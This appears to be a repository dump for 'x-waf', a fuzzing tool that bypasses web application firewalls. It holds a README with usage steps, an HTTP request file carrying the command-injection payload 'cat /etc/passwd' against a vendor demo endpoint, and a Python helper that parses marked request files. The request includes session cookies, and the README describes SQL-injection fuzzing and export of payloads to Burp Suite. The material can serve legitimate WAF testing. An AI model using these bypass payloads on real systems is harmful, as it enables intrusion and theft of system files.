├── .gitattributes
├── chatin-cmdchop.http
└── README.md

/.gitattributes:
--------------------------------------------------------------------------------
linux_x_waf filter=lfs diff=lfs merge=lfs -text
mac_x_waf filter=lfs diff=lfs merge=lfs -text
mac_amd64_x_waf filter=lfs diff=lfs merge=lfs -text

--------------------------------------------------------------------------------

/chatin-cmdchop.http:
--------------------------------------------------------------------------------
POST /demo/detect/ HTTP/1.1
Host: cmdchop.chaitin.com
accept: application/json, text/javascript, */*; q=0.01
accept-language: zh-CN,zh;q=0.9,en;q=0.8
content-type: application/json
cookie: _ga=GA1.2.212169703.1725506930; _ga_PNVRK9GRJ2=GS1.2.1725527773.2.1.1725529516.0.0.0; user_id=f62aa452-d92a-405a-9295-49aba0ed6d47; cid=dea7646d-7542-432f-858f-c745914a1e73; mid=c0b990d0-a3dc-455c-9f66-bac94da0b098
origin: https://cmdchop.chaitin.com
priority: u=1, i
referer: https://cmdchop.chaitin.com/demo/
sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-origin
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
x-requested-with: XMLHttpRequest
Content-Length: 50

{"type":"urlpath","payload":"/?p=%{{cat /etc/passwd}}%"}

--------------------------------------------------------------------------------

/README.md:
--------------------------------------------------------------------------------
A fuzz-based WAF bypass testing tool. It currently supports command execution and SQL injection bypass; more bypass methods and attack types will be supported later.

```
Usage:
  ./x-waf -target [flags] [command]
  ./x-waf [command]

Available Commands:
  cmd         fuzz cmd injection
  completion  Generate the autocompletion script for the specified shell
  help        Help about any command
  sql         fuzz sql injection

Flags:
      --debug-file-path string            specify request response log file path
      --fuzz-count int                    specify max fuzz times (default 10000000)
  -h, --help                              help for ./x-waf
      --justOutPutPayload                 just output payload to payloads.txt
      --log-level string                  specify log level, default is info (default "info")
      --target string                     specify the request file path
      --target-https                      specify whether the request is https protocol (default true)
      --target-mark string                specify the request fuzz position mark (default "%{{.*}}%")
      --waf-block-regex string            specify waf block regex
      --waf-block-rsp-status-code int     specify waf block response status code (default 403)

Use "./x-waf [command] --help" for more information about a command.
```

# Usage steps
1. Prepare the HTTP request file for the request that needs to get past the WAF, for example test.http:

```
POST /demo/detect/ HTTP/1.1
Host: cmdchop.chaitin.com
accept: application/json, text/javascript, */*; q=0.01
accept-language: zh-CN,zh;q=0.9,en;q=0.8
content-type: application/json
cookie: _ga=GA1.2.212169703.1725506930; _ga_PNVRK9GRJ2=GS1.2.1725527773.2.1.1725529516.0.0.0; user_id=f62aa452-d92a-405a-9295-49aba0ed6d47; cid=dea7646d-7542-432f-858f-c745914a1e73; mid=c0b990d0-a3dc-455c-9f66-bac94da0b098
origin: https://cmdchop.chaitin.com
priority: u=1, i
referer: https://cmdchop.chaitin.com/demo/
sec-ch-ua: "Chromium";v="130", "Google Chrome";v="130", "Not?A_Brand";v="99"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "macOS"
sec-fetch-dest: empty
sec-fetch-mode: cors
sec-fetch-site: same-origin
user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
x-requested-with: XMLHttpRequest
Content-Length: 50

{"type":"urlpath","payload":"/?p=cat /etc/passwd"}
```

2. Mark the payload position with %{{.*}}%, for example:

```
{"type":"urlpath","payload":"/?p=%{{cat /etc/passwd}}%"}
```

3. Run the command:

```
./x_waf --target test/chatin-cmdchop.http --waf-block-regex payload cmd --fuzz-cmd-mode real
```

--fuzz-cmd-mode real actually executes the command to verify whether the payload is effective; currently only reading the contents of the /etc/passwd file is supported

--fuzz-cmd-mode mock parses the command to verify whether the payload is effective; any command is supported

--waf-block-regex payload specifies the content to match in the page response when the WAF blocks the request; regular expressions are supported

4. View the bypass results:

```
cat result.txt
```

# Using together with Burp Suite
When the program runs into all kinds of strange errors, you can choose to use x-waf only to generate payloads, then use the Burp Suite Intruder module to iterate through them and send the requests, judging whether they were blocked by the response status code or the response length.

```
./x --justOutPutPayload --target test/chatin-sqlchop.http sql --fuzz-sql 'select user from mysql.user' --fuzz-count 1000
```

--justOutPutPayload exports the payloads to the payloads.txt file

# Notes
If the target is not HTTPS, add the `--target-https=false` flag

# Screenshot
[image]

# Discussion group
[image]


--------------------------------------------------------------------------------
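The README's steps 2 and 3 describe two pieces of the tool's input contract: the `%{{.*}}%` fuzz-position mark inside a raw `.http` request file, and the `--waf-block-regex` / `--waf-block-rsp-status-code` signals used to decide whether the WAF blocked a response. The example below is added here and is not code from the x-waf project; it parses a constructed request file in that format, locates the mark, flags the stale `Content-Length` that marking leaves behind, and applies the same two block signals to a response. The host name and the shortened header set are assumptions.

```python
import re

DEFAULT_MARK = r"%{{.*}}%"  # the tool's default --target-mark pattern

# Constructed sample in the tool's .http request-file format; the host is a
# placeholder and most headers from the page's example are omitted for brevity.
SAMPLE_HTTP = (
    "POST /demo/detect/ HTTP/1.1\r\n"
    "Host: waf-staging.example.internal\r\n"
    "content-type: application/json\r\n"
    "Content-Length: 50\r\n"
    "\r\n"
    '{"type":"urlpath","payload":"/?p=%{{cat /etc/passwd}}%"}'
)


def parse_request_file(text):
    """Split a raw HTTP request file into (request line, headers dict, body)."""
    head, _, body = text.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def find_mark(text, mark=DEFAULT_MARK):
    """Return (start, end, inner) of the first fuzz mark, or None.

    The default pattern is greedy, so two marks on one line would be read as
    one span; the `.*?` substitution stops the match at the first `}}%`.
    """
    m = re.search(mark.replace(".*", ".*?"), text)
    if m is None:
        return None
    return m.start(), m.end(), m.group(0)[3:-3]


def check_request_file(text, mark=DEFAULT_MARK):
    """Sanity-check a marked request file before handing it to the fuzzer."""
    request_line, headers, body = parse_request_file(text)
    declared = int(headers.get("content-length", -1))
    found = find_mark(body, mark)
    return {
        "request_line": request_line,
        "mark": found[2] if found else None,
        "declared_length": declared,
        # Marking the body changes its length while the header still says 50.
        "length_mismatch": declared != len(body),
    }


def is_blocked(status, body, block_regex=None, block_status=403):
    """Mirror the tool's two block signals: status code or response regex."""
    if status == block_status:
        return True
    return bool(block_regex) and re.search(block_regex, body) is not None
```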